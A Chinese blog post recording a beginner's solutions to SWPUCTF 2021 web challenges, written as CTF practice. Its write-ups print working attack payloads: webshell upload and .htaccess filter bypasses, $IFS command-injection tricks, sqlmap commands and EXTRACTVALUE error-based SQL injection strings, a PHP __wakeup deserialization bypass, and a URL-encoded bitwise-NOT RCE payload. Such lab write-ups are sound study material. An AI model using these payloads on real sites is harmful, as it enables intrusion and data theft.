刷题学习日记 (1) - SWPUCTF

最新推荐文章于 2024-09-27 16:57:59 发布
最新推荐文章于 2024-09-27 16:57:59 发布
阅读量642 收藏 12
点赞数 6
分类专栏: web 文章标签: 学习 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_81156108/article/details/142555223
版权

写这篇文章主要是想看看自己一个下午能干啥,不想老是浪费时间了,所以刷多少题我就会写多少题解,使用nss随机刷题,但是今天下午不知道为啥一刷都是SWPUCTF的。

[SWPUCTF 2021 新生赛]gift_F12

控制台ctrl+f搜索flag即可,得到flag

[SWPUCTF 2021 新生赛]caidao

怎么做写脸上了,直接连,

[SWPUCTF 2021 新生赛]jicao

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>

//阅读一下源码:可以看到要输出flag要满足POST传入id=wllmNB,GET传入json字符串经过解码后要满足$json['x']=="wllm",GET传入{"x":"wllm"}即可
NSSCTF{95d74e97-b06c-4fb2-b028-bb3a0ab2686c}

[SWPUCTF 2021 新生赛]Do_you_know_http

使用hackbar传入User-Agent :WLLM即可


第二关传入X-Forwarded-For :127.0.0.1 即可

[SWPUCTF 2021 新生赛]easy_md5

一个很简单的md5

[SWPUCTF 2021 新生赛]easyupload1.0

传个一句话木马试试

应该是给php后缀搬掉了,试试phtml,也搬掉了,不太行,传个图片

图片可以正常上传猜测检测字段Content-Type:

直接改个php试试

上传成功。

直接连接了,然后虚拟终端打开找找flag

找到了,但是上传之后竟然是错误的,看了wp后说要在phpinfo里面找,这个没想到

[SWPUCTF 2021 新生赛]nc签到

看题目直接拿vps nc一下吧

黑名单搬了一点

看看路径,可以使用l's'这样的方式绕过查看一下flag

ca't'$IFS$9flag

当然我们使用nl也是可以的

[SWPUCTF 2021 新生赛]easyupload2.0

直接蚁剑连接即可

[SWPUCTF 2021 新生赛]easyrce

没有任何限制直接RCE就行

[SWPUCTF 2021 新生赛]babyrce

加个cookie下一关出来了

空格过滤了直接${IFS}或者$IFS$9绕过

[SWPUCTF 2021 新生赛]ez_unserialize

开题没告诉题目开源码,意图明显,访问/robots.txt

找到目录


找到题目,解析一下,当类销毁的时候如果amdin=admin,passwd=ctf那么就输出flag,思路有了生成对象p的时候直接赋值对象p的admin和passwd属性即可

[SWPUCTF 2021 新生赛]include

给了个提示

经过包含发现没包含出来,搜了一下include_once函数的用法

说明flag.php已经被包含过了,那我们使用php伪协议将flag的base64直接输出,然后解码即可

[SWPUCTF 2021 新生赛]error

搜索框输入1,写没有提示?看看源码

看到源码给出提示

直接跑sqlmap

python sqlmap.py -u ”url" --dbs

python sqlmap.py -u “url” test_db --tables

python sqlmap.py -u “url” -D test_db -T test_tb --columns

python sqlmap.py -u “url” -D test_db -T test_tb -C flag --dump

这里是报错注入,SELECT * FROM users WHERE id='$id' LIMIT 0,1可以看到给了语句

直接进行报错注入:1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e))-- 原理:

SELECT * FROM users WHERE id='$id' LIMIT 0,1

SELECT * FROM users WHERE id='1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e))--' LIMIT 0,1

--后面的明显被注释了,

EXTRACTVALUE:

它的正常用法是从一个合法的 XML 文档中,按照给定的 XPath 语法规则,提取匹配的节点值。然而,当提供的 XML 或 XPath 是非法的或者不符合格式时

  • CONCAT(0x7e, (SELECT database()), 0x7e):将当前的数据库名称与两个 ~ 符号(十六进制 0x7e 表示的 ~)拼接。SELECT database() 会返回当前使用的数据库名称。
  • EXTRACTVALUE(1, ...):由于传递的参数不是有效的 XML 数据格式,EXTRACTVALUE() 会触发一个错误。这个错误的详细信息可能包含我们拼接的数据库名称,这样就通过报错信息泄露了敏感数据。

数据库名出来了;

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema='test_db' LIMIT 0,1), 0x7e))-- -

跑出来表名

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_name='test_tb' and table_schema='test_db' LIMIT 1,1), 0x7e))-- -

跑出来个flag列

直接拿出flag

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT flag FROM test_tb LIMIT 0,1), 0x7e))-- -

出了一半,

再找下一半应该是放不下了从右往左找试试

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT left(flag,30) FROM test_tb LIMIT 0,1), 0x7e))-- -

可以看到最多输出30位,输入31后后面的波浪号没了

把这两个找出来的flag整合一下即可

把这两个整合一下flag

[SWPUCTF 2021 新生赛]no_wakeup

小派蒙给了一个class.php,打开看看

是一个反序列化的题目,分析一下,当对象被反序列化的时候会自动调用wakeup魔术方法,意思是我们传入这一串O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}的时候passwd会变成SHA1(wllm)这样会导致我们不能满足条件,这题意图比较明显了,就是wakeup绕过,怎么绕过呢?

参考两篇文章:我感觉写的很好

PHP反序列化中wakeup()绕过总结 – fushulingのblog

PHP反序列化

我们这里直接把元素数改为3就可以绕过,为什么呢?

因为当传入数据被反序列化时因为多了一个元素但是找不到元素然后就不能完成整个反序列化的过程导致中途exit所以wakeup调用不了

这一个我看了感觉很有参考意义,记录一下

wake_up绕过练习参考:A new way to bypass __wakeup() and build POP chain - inhann的博客 | inhann's Blog

[SWPUCTF 2021 新生赛]easyupload3.0

依然选择直接传一个伪造的图片上去,依然这个图片是完全可以传的,

稍微改一改再次测试

稳定发挥啊还是可以传的,改下后缀呢?

看来不行了那我们只能用图片马先试试吧,我们已经传了一个jpg文件先试试能不能传.htaccess

成功了蚁剑连接一下

添加成功

找到flag

[SWPUCTF 2021 新生赛]finalrce

一个防火墙绕过,tac 没禁了,看wp学到了点东西

find / | tee 1.txt

可以输出根目录到1.txt文件里面尝试一下,试了完全打不开太大了有点,我们在vps上下载下来吧

 curl -O http://node4.anna.nssctf.cn:28864/1.txt

然后找一找敏感文件

cat 1.txt |grep /fl*
 

可以看到输出的最后就是很明显的flag啊直接 tac /flllllaaaaaaggggggg,但是la不能连接在一起我们这里用用一个正则分开tac /flllll\aaaaaaggggggg,这里是看不到东西的使用和刚刚一样的方法tee试试

tac /flllll\aaaaaaggggggg | tee 2.txt

获取到flag

[SWPUCTF 2021 新生赛]hardrce


防火墙禁止了很多东西,字母字母用不了,也禁止了很多符号啊,没什么思路参考wp

<?php
a="system";a="system";b = “cat /f*”;
echo urlencode(~a); print("\n"); echo urlencode(~b);
?>

这样也可以绕过。

url编码绕过限制

?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%D5);

学到了

我在学习真的在学习
关注
专栏目录
刷题算法提高阶段-搜索1
12-22
相比之下,Bellman-Ford算法可以处理边权重为负的情况,但效率稍低,因为它需要进行V-1轮迭代(V为图的顶点数)。在每一轮迭代中,算法会检查所有边并尝试更新节点的最短路径。如果在V-1轮后仍有负权回路,那么图中...
刷题算法提高阶段-数据结构1
12-22
在"刷题算法提高阶段-数据结构1"这个主题中,我们主要关注的是通过解决编程问题来提升对数据结构的理解和应用能力。 首先,我们要讨论的是并查集(Disjoint-Set),这是在文件"4.1 并查集.mp4"中涉及的核心内容。并...
高薪程序员必备刷题软件-u-boot-imx:u-boot-imx
07-07
【标题】"高薪程序员必备刷题软件-u-boot-imx:u-boot-imx" 指的是一个针对程序员提升技能的刷题软件,特别关注于 u-boot-imx 这一部分的内容。u-boot 是一个广泛使用的开放源代码引导加载程序,主要用于嵌入式系统,...
CSP刷题-cspCSP刷题-csp
09-22
csp csp csp csp csp
Spring Boot 学习和使用
cesske的博客
09-24 1027
Spring Boot是一款开源的Java Web应用框架,旨在简化Spring应用的初始搭建以及开发过程。Spring Boot通过整合Spring技术栈中的诸多关键组件,为开发者提供了一种快速、简便的Spring应用开发方式。它遵循“约定优于配置”的原则,通过自动配置、起步依赖和内置的Servlet容器,极大地简化了传统Spring应用的配置和部署过程。Spring Boot通过其自动化配置、起步依赖、内嵌服务器等特性,极大地简化了Spring应用的开发和部署过程。
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4465
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
D15【python接口自动化学习】-python基础之内置数据类型
tian_nx的博客
09-22 607
为字典增加或移除键值对,如果新增键已存在,则更新该键对应的值...
elasticsearch学习与实战应用
cesske的博客
09-22 1083
Elasticsearch的学习与实战应用是一个涉及多个方面的过程,以下将从学习路径、核心概念、实战应用及优化策略等方面进行详细介绍。提示:以下是本篇文章正文内容,下面案例可供参考综上所述,Elasticsearch的学习与实战应用是一个系统而复杂的过程,需要不断学习和实践。通过掌握基础知识、进阶知识和实战操作技巧,并结合优化策略来提高性能和可靠性,可以充分发挥Elasticsearch在数据处理和搜索分析方面的优势。
大模型输入参数学习
AI智能,无处不在
09-25 332
top_p和top_k:用于控制生成文本的多样性和连贯性。较小的值会使生成的文本更连贯但缺乏多样性,较大的值会使生成的文本更随机和多样。:用于控制生成文本的随机性。较高的值增加随机性,较低的值增加确定性。:用于控制生成文本的长度。
Nexus学习
howwickhappy的博客
09-24 975
Nexus 是一个开源的仓库管理器,用于管理和分发软件构建的组件。
Linux入门学习:进程概念
Lvision2的博客
09-24 1062
在课本的概念中,进程程序的一个执行实例,正在执行的程序。其内核观点:担当分配系统资源(CPU时间,内存)的实体。但这些概念太笼统,并不能让我们更加清晰的知道进程是什么,实际上,进程是内核数据结构(pcb) + 程序的代码与数据。pcb(process control block)进程控制块,进程信息被放在一个叫pcb的数据结构中,可以理解为进程属性的集合。在Linux入门学习:深刻理解计算机硬件与OS体系中,我们已经了解到。
【Verilog学习日常】—牛客网刷题—Verilog企业真题—VL63
最新发布
qq_44629558的博客
09-27 329
设计一个模块进行,要求每四位d输为转到一位dout输出,输出valid_in表示此时的输入有效。clk为时钟rst为低电平复位valid_in 表示输入有效d 信号输入dout 信号输出。
2024-2025华为ICT大赛报名|赛前辅导|学习资料
qq2859066538的博客
09-25 257
华为ICT大赛是华为公司打造的面向全球高校的年度ICT赛事,大赛以“联接、荣耀、未来”为主题,协同政府、高等教育机构、培训机构和行业企业,促进高校ICT人才培养、成长和就业,助力ICT人才生态繁荣。华为ICT大赛2023-2024实践赛涵盖网络、云、计算(第九届华为ICT大赛更名为基础软件)和昇腾AI四个赛道。为有效帮助参赛者把握命题思路、突破重点内容、检验学习效果、提高实战经验,更充分地备战大赛,华为首次推出华为ICT大赛2023-2024实践赛真题实战系列课程,为您铺就通往大赛的成功之路。
js基础巩固学习,包含数据类型、继承、闭包、数组、异步、垃圾回收机制等
m0_73761441的博客
09-23 1599
js基础巩固学习,包含数据类型、继承、闭包、数组、异步、垃圾回收机制等
智能指针学习笔记
weixin_42130300的博客
09-24 292
1. 共享指针总体的使用来说是不线程安全的(构造和析构时才会改变引用计数,但是在访问资源时是不安全的)。可以对引用计数改变时加锁,或者将+或-操作改变为原子操作。3. 不可以将shared_ptr转换为unique_ptr。unique_ptr可以转换为shared_ptr,通过std::move。1. 关于int,成员变量的引用计数必须是int*。不可以直接是int,不然没有引用计数的作用。2. 关于是否可以声明为静态成员。不可以,否则每一个相同类型的对象都共享该计数。需要通过weak_ptr进行解决。
TDengine 学习与使用经验分享:业务落地实践与架构升级探索
喵手的博客
09-24 1000
随着物联网、工业互联网等行业的快速发展,时间序列数据的管理和处理需求急剧增加。传统的关系型数据库在处理大规模、高频次的时序数据时性能存在瓶颈,而专门针对时序数据设计的数据库系统则显示出其独特优势。TDengine 是其中的佼佼者,凭借其轻量级、高效的架构设计和强大的分布式能力,越来越多的企业开始关注并应用这款产品。在本文中,我将结合个人的学习使用经验,详细分享 TDengine 在实际业务中的应用场景,如何帮助我们改造和升级原有架构,并介绍一些集群部署、业务建模以及代码层面的分析思路。
UEFI EDK2框架学习 (一)
yttt的博客
09-23 346
执行qemu指令后出现shell界面。
sheng的学习笔记-AI-K-摇臂赌博机(K-armed bandit)
coldstarry的专栏
09-24 667
强化学习
UE学习篇ContentExample解读-----------Blueprint_Overview
航行的土豆的博客
09-22 1119
UE官方案例ContentExample解读,关卡:Blueprint_Overview
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值